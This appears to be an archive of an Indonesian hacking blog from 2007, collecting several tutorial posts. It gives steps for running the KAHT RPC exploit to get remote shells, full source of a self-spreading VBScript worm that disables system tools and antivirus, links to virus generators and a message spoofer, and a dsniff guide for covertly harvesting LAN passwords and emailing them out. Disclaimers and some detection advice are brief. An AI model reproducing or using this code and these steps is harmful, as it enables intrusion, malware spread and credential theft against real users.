9/20/2007

Cara membobol Password Windows

Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.

Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download disini .
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:


--------------------------------------------------------------------------------

KAHT II - MASSIVE RPC EXPLOIT dst

--------------------------------------------------------------------------------
[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress......
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst........
C:WINNTsystem32>

Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll
Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.

9/19/2007

VB ViMaker32 RC 03

Ingin mendownload software VB+Vimaker32


pardila46_craker@yahoo.com

VB+Vimaker RC 03, selain merupakan Virus/Worm generator, juga merupakan sebuah software untuk membuat program komputer berbasiskan security dengan instan, mudah dan cepat. Dalam Versi ini, banyak terdapat fitur-fitur baru yang ditambahkan dan lebih banyak yang dapat dikustomasi dengan tampilan yang user friendly. Untuk informasi lebih lanjut, buka dokumentasinya. Download di Sini

Sumber:http://www.spyrozone.net/

Virus MP3 Viriii

Download Softwaranya dan source kodenya di sini

Membuat virus macro sendiri

Berdasarkan sifat dan penyerangannya, virus komputer dapat dibedakan menjadi beberapa macam, misalnya virus boot sector, virus file, polymorphic virus, stealth virus, dan virus makro. Virus makro ini dapat menyerang pada dokumen MS Word, Excel atau Power Point. Virus makro ini termasuk virus yang paling banyak dijumpai di sekitar kita. Tentunya kita masih ingat dengan adanya virus Mellisa atau virus I Love You yang juga dapat kita masukkan ke dalam kategori virus macro.

Mengapa virus makro ini sering sekali kita jumpai? Jawabnya tentu saja karena populasi pengguna MS Office sangat banyak. Dengan pengguna yang cukup banyak tentunya virus makro dapat berkembang dengan cepat. Dengan melakukan pertukaran data *.doc (dokumen MS Word) yang telah terinfeksi maka sudah cukup untuk membuat semua dokumen menjadi terinfeksi.



Yang menarik, bagaimana cara membuat virus makro tersebut? Kalau Anda seorang programmer, dengan bantuan berbagai referensi tentunya mudah saja untuk belajar membuat virus makro. Masalahnya bagaimana kalau kita sama sekali tidak menguasai bahasa pemrograman?

Tenang saja, di internet banyak sekali software yang dapat digunakan untuk membuat virus makro. Salah satunya adalah SkamWerks Lab. Dengan fasilitas Virii Wizard, kita dapat membuat virus mulai dari awal sampai selesai. Saat menggunakan Virii Wizard, kita dapat menuliskan pembuat virusnya, nama virus, dan makro-makro yang akan dimasukkan ke dalam virus. Nah, daripada penasaran, silakan Anda cepat-cepat mencobanya sendiri. Tentunya setelah Anda mendownload programnya di sini.

membuat virus dengan Notaped

Membuat Virus Memakai Notepad 2


Hi…..
Melanjutkan artikel yang waktu itu “BUAT VIRUS VIA NOTEPAD” kita akan membuat virus yang lebih hebat lagi. Kalau ada yang belum tahu, saya mau minta maaf karena di artikel sebelumnya ada kesalahan code. Silahkan ganti kata “rekursif” menjadi “rekur”. Kalau enggak, bisa syntax error nanti

Nah kita akan buat varian lain dari KALONG.VBS. Yaitu KALONG-X.VBS. Lebih hebat dari Kalong.VBS. Sebenarnya ini varian ketiga. Sebenarnya virus ini sama saja dengan Kalong.VBS namun ditambahkan kemampuan manipulasi registry yang lebih mengerikan
Ayo sekarang kita buka saja Notepadnya dan ketikkan code berikut. Jika malas kan tinggak Copy > Paste….
‘Kalong-X
‘Varian dari Kalong.VBS
on error resume next

‘Dim kata-kata berikut
dim rekur,windowpath,desades,fs,mf,isi,tf,kalong,nt,check,sd

’siapkan isi autorun
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :




Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Mengirim pesan dengan NetSend

Net Send merupakan service yang terdapat pada Windows XP. Dengan menggunakan Net Send kita dapat mengirim pesan ke sesama pengguna komputer dalam satu jaringan.


Syntax:

net send {name | * | /domain[:name] | /users} message

Untuk mengirim pesan ke semua komputer dalam satu workgroup atau domain:

net send * pesan ini terkirim ke semua user

Untuk mengirim pesan ke komputer tertentu


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Pada artikel sebelumnya sudah dijelaskan mengenai cara mengirim pesan dengan menggunakan perintah Net send. Selain dengan menggunakan Net Send Anda dapat menggunakan program NetSendFaker untuk mengirim pesan pada jaringan lokal.




Sesuai dengan namanya, program NetSendFaker akan “memanipulasi” nama komputer pengirim. Misalnya nama komputer Anda adalah Komputer1 maka Anda dapat mengirim pesan ke komputer lain seolah-olah pengirimnya adalah KomputerX.

Anda dapat mendoownload program NetSendFaker di sini.

Catatan:
Tentunya Anda harus bijak dalam menggunakan program ini, jangan menggunakan program ini untuk mengganggu “ketertiban umum”.

Menampilkan Password yang Tersembunyi Dengan Asterisk Key

Menampilkan Password yang Tersembunyi Dengan Asterisk Key


Kotak isian password biasanya akan tersembunyi dengan karakter ****** (asterisk). Dengan menggunakan software gratisan alias freeware Asterisk Key maka Anda menampilkan password yang tersembunyi tersebut, baik pada aplikasi biasa maupun web.

Untuk menggunakan Asterisk Key caranya cukup mudah. Pertama, jalankan dulu program atau website yang akan dicari passwordnya, setelah itu jalankan Asterisk Key. Selanjutnya klik tulisan recover (seperti pada contoh gambar di bawah ini).



Secara otomatis Asterisk Key akan mencari aplikasi yang ada passwordnya. Jika ditemukan maka hasilnya akan ditampilkan. Contoh di bawah ini, Asterik Key berhasil menemukan dua passwod, yaitu password pada suatu aplikasi dengan password = passwordku dan password pada web dengan password = rahasia.



Ingin mendapatkan softwarenya download di Sini

9/18/2007

kode jahat / perusak

Definisi
Kode jahat/perusak (malicious codes atau disingkat malcodes) didefinisikan sebagai semua macam program, makro atau script yang dapat diesekusi dan dibuat dengan tujuan untuk merusak sistem komputer. Oleh karena itu bug yang dibuat secara tidak sengaja oleh programer, tidak termasuk dalam kategori ini. Tetapi untuk bug yang benar-benar mengganggu, banyak orang mengkategorikannya sebagai malcode.

Dahulu digunakan istilah "Malware (= Malicious Software)" ditujukan untuk malcode. Tetapi istilah ini terlalu lemah dan sempit, sehingga e-mail palsu/bohong yang notabene bukan software tidak dapat dimasukkan dalam golongan ini. Oleh karena itu digunakan istilah malcode, bukan malware.


Klasifikasi
Kode perusak dapat digolongkan dalam 3 macam golongan: virus, worm dan Trojan Horses, serta beberapa program yang memiliki bug.

Virus

Virus memiliki kemampuan jahat untuk mereproduksi diri mereka sendiri dan terdiri dari kumpulan kode yang dapat memodifikasi target kode yang sedang berjalan, atau dapat pula memodifikasi struktur internal target kode, sehingga target kode sebelum berjalan dipaksa menjalankan virus.

Virus sering menampilkan pesan yang tidak disukai, merusak tampilan display, menghapus memory C-MOS, merusak informasi dalam hard disk dll. Efek yang ditimbulkan virus mengalami perkembangan yang cukup serius akhir-akhir ini.

Contoh virus: Brain, Ohe half, Die hard, XM/Laroux, Win95/CIH

Virus masih dapat dibagi lagi dalam beberapa kategori:

Boot Virus: Jika komputer dinyalakan, sebuah inisial program di boot sector akan dijalankan. Virus yang berada di boot sector disebut boot virus.

File Virus: File virus adalah virus yang menginfeksi executable program. Dilaporkan bahwa hampir 80% virus adalah file virus.

Multipartite Virus: Virus yang menginfeksi baik boot sector dan file.

Macro Virus: Belakangan diketemukan. Targetnya bukan executable program, tetapi file dokument seperti Microsoft Excel atau Word. Ia akan memulai menginfeksi bila program aplikasi membaca dokumen yang berisi macro.

Worm

Worm ditujukan kepada program yang mengkopi dirinya sendiri ke HANYA memory komputer. Perbedaan mendasar dari worm dan virus adalah, apakah menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya ngendon di memory.

Worm pada awalnya diketemukan di large computer (1970-an), dan akhir- akhir ini saja diketemukan di komputer kecil seperti PC. Terutama sejak 1999, dimana work banyak beredar melalui media email.

Contoh worm: I-Worm/Happy99(Ska), I-Worm/ExploreZIP, I-Worm/PrettyPark, I-Worm/MyPics

Trojan Horse

Trojan Horse diproduksi dengan tujuan jahat. Berbeda dengan virus, Trojan Horse tidak dapat memproduksi diri sendiri. Pada umumnya, mereka dibawa oleh utility program lainnya. Utility program tersebut mengandung dirinya, atau Trojan Horse itu sendiri ber"lagak" sebagai utility program.

Contoh Trojan Horse: Win-Trojan/Back Orifice, Win-Trojan/SubSeven, Win-Trojan/Ecokys(Korean)

Trojan Horse masih dapat dibagi lagi menjadi:

DOS Trojan Horse: Trojan Horse yang berjalan di DOS. Ia mengurangi kecepatan komputer atau menghapus file-file pada hari atau situasi tertentu.

Windows Trojan Horse: Dijalankan di system Microsoft Windows. Jumlah Windows Trojan Horse meningkat sejak 1998 dan digunakan sebagai program untuk hacking dengan tujuan jahat yang dapat mengkoleksi informasi dari komputer yang tersambung internet.


Trend Malcode di Jepang tahun 1999
Virus tradisional: 6%
Windows Virus: 8%
Worm: 31% (tahun 1998, hampir 0%)
Macro Virus: 55%

tutorial hacking dengan NetCat

Netcat merupakan tools yang banyak dipakai para hacker. Kepopulerannya terlihat dari hasil survey lebih dari 1000 pengguna Nmap pada tahun 2000 dan 2003 yang menempatkannya pada urutan 5 besar, yaitu urutan ke 2 pada tahun 2000 dan urutan ke 4 pada tahun 2003.

Tools ini sering disebut sebagai "TCP/IP Swiss Army Knife"-nya para hacker. Versi orisinalnya ditulis untuk sistem operasi Unix oleh Hobbit (hobbit@avian.org) pada tahun 1995. Versi Windows NT dikerjakan oleh Weld Pond (weld@l0pth.com).

Fitur dari Netcat antara lain adalah:

Dapat mebangun koneksi Outbound dan inbound dengan TCP atau UDP, di dan dari port mana saja.
Dapat membaca argumen pada command line dari standar input
Full DNS forwarding/reverse checking
Kemampuan untuk menggunakan any local source port
Kemampuan menggunakan any locally-configured network source address
Tersedia port scanning secara built-in
Dan lain-lain
Dengan fitur di atas, banyak para hacker dan pengelola sistem memanfaatkan untuk melakukan hal-hal sebagai berikut:

Scanning port dan menginventori service-service yang terpasang pada server
File transfer
Pengujian dan simulasi terhadap server
Pengujian terhadap firewall, proxy dan gateway
Pengujian performance network
Pengujian address spoofing
Banner grabbing
Beberapa fitur dan pemanfaatan Netcat akan dijelaskan di bawah. Namun kami harus selalu mengingatkan Anda, jangan pernah mencoba kemampuan netcat di sistem komputer yang bukan milik anda sendiri !

9/17/2007

Manen password di warnet atau Lab Kom dengan dsniff

Manen Password Di warnet atau Lab Kom dengan dsniff

Memanen Password Di warnet atau Lab KOm dengan dsniff


Baru mulai tertarik masalah keamanan? Pingin ngebuktiin ketidakamanan jaringan lokal kepada admin? Atas permintaan umum (dan seringnya teman-teman admin nanyain tentang sniffing), berikut adalah cara cepat (kurang lebih 15 sampai 30 menit) memanen password dengan menggunakan teknik yang sangat awam: ethernet sniffing. Tentunya akan dibahas juga cara-cara pendeteksian dan pemberantasannya.

Komunikasi ethernet pada dasarnya adalah komunikasi tipe “siaran” (broadcast). Paket-paket ethernet dari mesin yang satu sebetulnya dilihat oleh setiap komputer yang tergabung dalam suatu jaringan lokal. Paket-paket ini dibuang jika alamat MAC-nya tidak cocok dengan alamat node tujuan.
Nah, dengan menggunakan software-software ‘network sniffer’, paket-paket ethernet (beserta isinya) yang melewati kartu ethernet tertentu tidak dibuang begitu saja, melainkan dianalisa. Banyak kegunaan sniffing, tapi di artikel ini penulis hanya membahas sniffing password dengan menggunakan program paten karangan Dug Song (www.monkey.org/~dugsong) dsniff.

dsniff aslinya adalah software Unix, dan teman-teman yang punya Linux/BSD bisa langsung ngedownload dan compile dsniff dari http://www.monkey.org/~dugsong/dsniff). Artikel ini membahas penggunaan di
jaringan lokal berbasis Windows, sebab artikel ini ditujukan untuk pemula, dan mereka-mereka yang pingin memanen password tapi nggak punya akses ke Unix. Program dsniff ini punya spesialisasi menggarap password dari berbagai protokol, dan memformat hasil panenan dalam bentuk yang mudah dibaca.
Protokol yang bisa ditangani oleh dsniff antara lain adalah FTP, Telnet, HTTP, POP, NNTP, IMAP, SNMP, LDAP, Rlogin, NFS, SOCKS, X11, IRC, AIM, CVS, ICQ, Napster, Citrix ICA, Symantec pcAnywhere NAI Sniffer, Microsoft SMB, dan Oracle SQL*Net auth info.

Penggunaan dsniff tidak begitu jauh berbeda antara versi Win32 dengan versi Unix-nya. Kelebihan yang bias dinikmati pengguna Unix saat ini adalah adanya dua program tambahan di dsniff yang membuat dsniff versi Unix lebih perkasa, mampu memanen password dari jaringan berbasis “ethernet switch” atau “active hub”, jadi tidak terbatas ke jaringan “hub” saja.

Bahan-bahan/Persyaratan:
——————————–
LAN lokal untuk target, yang terhubung dengan menggunakan “ethernet hub” (bukan switch)
- mesin Windows 95, 98 atau ME (untuk 2000 dan XP, kamu mesti punya hak administrator di mesin yg akan digunakan untuk memanen) yang terhubung ke LAN target
- WinPCap library, download dari http://netgroup-serv.polito.it/winpcap/install/bin/WinPcap.exe
- dsniff port to Win32, download dari http://www.datanerds.net/~mike/binaries/dsniff-1.8-win32-static.tgz
(gunakan WinZip untuk nge-extract file-file .exe-nya)

Cara Memasak
——————

- Install WinPcap library. Doubleclick winpcap.exe dan ikuti petunjuk di layar (tinggal pencet “Next”,”Next”,”Finish”)
- Extract file dsniff…tgz nya ke suatu directory (sebaiknya di bawah
C:\Windows atau tempat lain yang nggak terlalu mencurigakan - untuk artikel ini, anggap saja disimpan di C:\WINDOWS\DS)
- Mulai memanen password. Dari start menu, klik “Run”, ketik “command”. Pindah ke direktori tempat disimpannya dsniff (”cd \windows\ds”). dari prompt C:> tinggal ketik “dsniff”.
- silakan menonton password-password milik pengguna ditampilkan di layar

Catatan:
———-
Ada kemungkinan anda harus menspesifikasikan kartu ethernet mana yang ingin disadap. Untuk melihat daftar-daftar interface yang tersedia, ketik “dsniff -D” dari prompt DOS. Anda akan melihat daftar interface yang tersedia. Jika secara default dsniff mencoba menyadap interface yang salah, gunakan “dsniff -i [ketik nama interface disini]”.

Pengembangan lebih lanjut
———————————

Untuk menyimpan daftar password yang terpanen ke sebuah file, tambahkan perintah “-w [namafile]” ke program dsniff. Contoh: “c:\WINDOWS\DS>dsniff -i ELNK3 -w password.db”

untuk membaca file yg dibuat dsniff, berikan perintah “-r [namafile]”
contoh: “C:\WINDOWS\DS>dsniff -r password.db”

secara opsional, jika anda ingin file hasil panen ini disimpan dalam bentuk file ASCII:
“C:\WINDOWS\DS>dsniff -r password.db > panen.txt”,

panen.txt siap disajikan.

Yang lebih asyik lagi, bisa kita konfigurasikan agar usaha panen kita tetap berjalan walaupun komputer tersebut di-reboot.Caranya gampang. Mula-mula download dulu program “start minimized” (sm.exe) dari http://www.ethernal.org/List-Archives/curves-kiddies-0010/msg00029.html. Simpan program ini di
C:\WINDOWS. Kemudian kita bikin batch file yang bisa dijalankan dari command prompt. Gunakan Notepad atau “edit” untuk membuat file ini, dan sebagai isi:
@echo off
sm /hidden c:\windows\ds\dsniff.exe -w > password.db

(tambahkan perintah opsional seperti “-i ELNK3″ jika perlu)

Nah, simpan file ini (sebagai “ds.bat”, misalnya), dan pindahkan file ini ke folder “Startup” lewat Start menu supaya tiap kali komputer di-restart, program dsniff kita dijalankan juga, siap untuk memanen. Program “sm” diatas berfungsi menjalankan program secara tersembunyi supaya tidak mencurigakan.
Tentu saja, biar lebih nggak mencurigakan lagi, rubah nama dsniff.exe ke nama lain, dan jangan lupa ngeganti perintah “dsniff” dengan nama yang baru di semua command dan batch file.
Sekarang anda bisa tinggalkan komputer tersebut, dan dikemudian waktu kembali lagi untuk memeriksa sejauh mana hasil sadapan anda bekerja (dengan perintah “dsniff -r password.db > panen.txt” lalu “notepad panen.txt”).

Membuat sadapan lebh portabel
—————————–
Untuk membuat disket dsniff, file-file yang anda perlukan adalah: dsniff.exe
wpcap.dll (cari di C:\WINDOWS\SYSTEM atau C:\WINDOWS\SYSTEM32 untuk Win2K/XP) wpcap.vxd packet.dll

simpan file-file ini ke disket (A:), dan tinggal dibawa disketnya ke LAN target. Penjalanan perintah masih tetap sama seperti diatas, kecuali lokasi prompt nya bukan di :\WINDOWS\DS>, melainkan di A:\>.
Jika anda butuh tantangan tambahan, gunakan perintah “at” dan program pengirim email blat.exe” untuk mengirimkan hasil panenan ke alamat e-mail anonimus anda setiap jam atau bahkan setiap 5 menit. Jangan lupa bagi-bagi hasil :).

Tambahan-tambahan
—————–
Port dsniff-win32 juga mengandung beberapa utility ekstra, seperti mailsnarf (untuk membaca lalu lintas e-mail di jaringan lokal), urlsnarf (untuk membaca alamat-alamat website yang dikunjungi pengguna LAN sekitar anda), dan webspy (untuk menguntit jejak surfing mesin tertentu).

Silahkan anda coba main-main dengan utiliti-utiliti ini, penulis yakin akan ada gunanya. Harap diingat bahwa teknik diatas hanya mempan untuk LAN yang terhubung melalui “ethernet hub”. Jika kebetulan LAN anda menggunakan “ethernet switch”, bukan berarti nggak ada harapan. Pengguna versi
Unix-nya dsniff bisa cengar-cengir, sebab paket dsniff versi Unix mengandung dua program tambahan: arpspoof (untuk ‘menipu’ mesin-mesin lain agar mengirimkan paket ke mesin anda) dan macof (untuk membanjiri “switch” lokal dengan alamat-alamat MAC acak, biasanya berakibat “ethernet switch”
yang ditargetkan menjadi bingung dan mengubah mode menjadi default, bertingkah laku seperti “ethernet hub”).

Deteksi, Pencegahan, dan Penanggulangan
—————————————
Sebagai admin, anda bisa mendeteksi kartu-kartu ethernet di LAN anda yang menjalankan dsniff (dan progarm-program sejenis dsniff) karena secara prinsip, untuk meng-capture paket-paket, interface ybs harus berada dalam mode “promiscous”. Jadwalkan program-program ini untuk berjalan setiap 5 menit, dan konfigurasikan agar komputer pendeteksi mengemail anda jika ada aktifitas-aktifitas mencurigakan.
Utiliti yang bisa anda gunakan termasuk “promisc”, “CPM”, “ifstatus”, atau yang lebih yahud lagi, utilitas buatan grup hacking Portugal The Apostols yang bernama “NePED” (http://metalab.unc.edu/pub/Linux/distributions/trinux/src/neped.c). Untuk platform Windows, tersedia produk-produk komersil seperti LANGuard/LANSniffer atau AntiSniff dari L0pht Heavy Industry (http://www.l0pht.com/antisniff). Diantara produk-produk diatas, sebagian besar hanyalah bisa mendeteksi adanya sniffer jika dijalankan di mesin lokal. Untuk mendeteksi network secara remote, gunakan NePED atau AntiSniff.

Jika anda punya budget, beli switch ethernet yang nggak nge-default ke “hub mode” kalau di-flood alamat-alamat MAC palsu. Kalau anda nggak ngerti, harap ngambil kursus “Pengenalan TCP/IP” atau berhenti jadi admin. Juga harap ingat bahwa banyak perusahaan-perusahaan yang mengklaim menjual hub yang tak bisa disadap, tapi ternyata hanya menjual hub tipe “active huub” yang biasanya tidak bisa menghandel traffic Fast Ethernet (100 Mbps).

Cara paling handal untuk mencegah bocornya informasi sensitif lewat network adalah dengan menggunakan enkripsi. Pakailah SSH, SCP (pengganti FTP) atau SFTP, TLS (untuk memeriksa e-mail), SSL dan HTTPS (untuk transaksi web), tunelling, dll. Usahakan agar jangan sampai ada program yang mengirimkan password tanpa enkripsi melalui jaringan yang anda kelola. Juga selalu periksa keadaan hard disk anda.
Seringkali sniffer-sniffer meninggalkan jejak berupa file hasil panenan yang berukuran besar (apalagi jika LANnya sibuk).

Cara lain mengamankan network anda adalah dengan memindahkan topologi jaringan anda ke sistem token ring, _dan_ menggunakan kartu-kartu ethernet Token-Ring buatan IBM (iklan sabun colexz). Tapi tentunya metode ini tidaklah praktis bagi anda yang ingin tetap menggunakan topologi star atau hybrid.


/* ——————————|EOF|—————————— */

sumber : http://www.spyrozone.net/

hacking jaringan dengan bug windows XP service pack 1 ke bawah

Hacking jaringan dengan bug windows XP service pack 1 ke bawah


